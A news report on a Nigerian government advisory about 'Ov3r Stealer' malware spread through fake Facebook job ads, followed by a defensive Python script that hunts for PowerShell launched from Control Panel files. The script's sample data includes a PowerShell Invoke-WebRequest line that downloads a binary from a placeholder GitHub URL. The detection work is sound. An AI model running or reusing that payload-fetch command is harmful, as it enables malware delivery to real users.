The National Information Technology Development Agency (NITDA)’s Computer Emergency Readiness and Response Team (CERRT) has alerted Nigerians to a new malware attack identified as ‘Ov3r Stealer’ targeting Facebook users. In a recently released advisory, the Agency said the new threat deceives Facebook users into clicking on malicious links under the guise of job advertisements, through which it gains access to the users’ sensitive information and extracts their data for attacks.
“A new threat, known as ‘Ov3r Stealer’ malware, has emerged, targeting users on Facebook, spreading through deceptive job advertisements and fake accounts.
“Users become infected by clicking on these malicious advertisement links. The malware employs various execution methods to extract sensitive data from victims.
“The Ov3r_Stealer malware can also be used as a dropper for other malware, including ransomware,” the Agency in charge of technology regulation in Nigeria stated.
NITDA added that when users click on the advertisement, they are redirected to a malicious Discord URL, which executes the malware through a PowerShell script masquerading as a Windows Control Panel (CPL) file to download the malware payload from a GitHub repository.
“Ov3r_Stealer poses a significant risk by silently exfiltrating a wide range of personal and sensitive information including geolocation (based on IP), hardware info, passwords, cookies, credit card information, auto-fills, browser extensions, crypto wallets, Office documents, and antivirus product information.”
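For defenders, the chain described above (a Control Panel file leading to PowerShell that downloads from a code-hosting site) can be hunted in process-creation logs. The sketch below is an added example, not part of the NITDA advisory. The event field names, the heuristics and every sample event are assumptions constructed for illustration, and the `.cpl` matcher assumes paths without spaces.

```python
import re

CPL = re.compile(r"(\S+\.cpl)\b", re.I)            # path token ending in .cpl (no spaces)
SYSTEM_DIR = re.compile(r"^c:\\windows\\(system32|syswow64)\\", re.I)
SHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
REPO_HOST = re.compile(r"https?://(github\.com|raw\.githubusercontent\.com)/", re.I)

def cpl_ancestor(event, by_pid):
    """Return the first .cpl path seen in an ancestor's command line, else None."""
    seen, parent = set(), by_pid.get(event["ppid"])
    while parent and parent["pid"] not in seen:     # guard against pid loops
        seen.add(parent["pid"])
        match = CPL.search(parent["cmd"])
        if match:
            return match.group(1)
        parent = by_pid.get(parent["ppid"])
    return None

def find_cpl_powershell_chains(events):
    """Flag PowerShell processes descended from a Control Panel (.cpl) launch."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        cpl = cpl_ancestor(e, by_pid) if SHELL.search(e["image"]) else None
        if cpl is None:
            continue
        reasons = ["powershell descended from .cpl launch"]
        if not SYSTEM_DIR.match(cpl):
            reasons.append("cpl outside system directory")
        if REPO_HOST.search(e["cmd"]):
            reasons.append("fetches from code-hosting site")
        findings.append({"pid": e["pid"], "cpl": cpl, "reasons": reasons})
    return findings

# Constructed sample events; pids, paths and the URL are placeholders.
S32 = r"C:\Windows\System32"
PS = S32 + r"\WindowsPowerShell\v1.0\powershell.exe"
FETCH = "powershell.exe Invoke-WebRequest https://github.com/EXAMPLE/EXAMPLE/raw/main/x.bin"
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": S32 + r"\control.exe",
     "cmd": r"control.exe C:\Users\a\Downloads\job_offer.cpl"},
    {"pid": 210, "ppid": 200, "image": S32 + r"\rundll32.exe",
     "cmd": r"rundll32.exe Shell32.dll,Control_RunDLL C:\Users\a\Downloads\job_offer.cpl"},
    {"pid": 220, "ppid": 210, "image": PS, "cmd": FETCH},   # suspicious chain
    {"pid": 300, "ppid": 100, "image": PS, "cmd": FETCH},   # same fetch, no .cpl ancestor
]
if __name__ == "__main__":
    print(find_cpl_powershell_chains(EVENTS))
```

Only pid 220 is reported. The identical download launched directly from the desktop shell (pid 300) is not, which shows that the parent chain carries the signal rather than the URL.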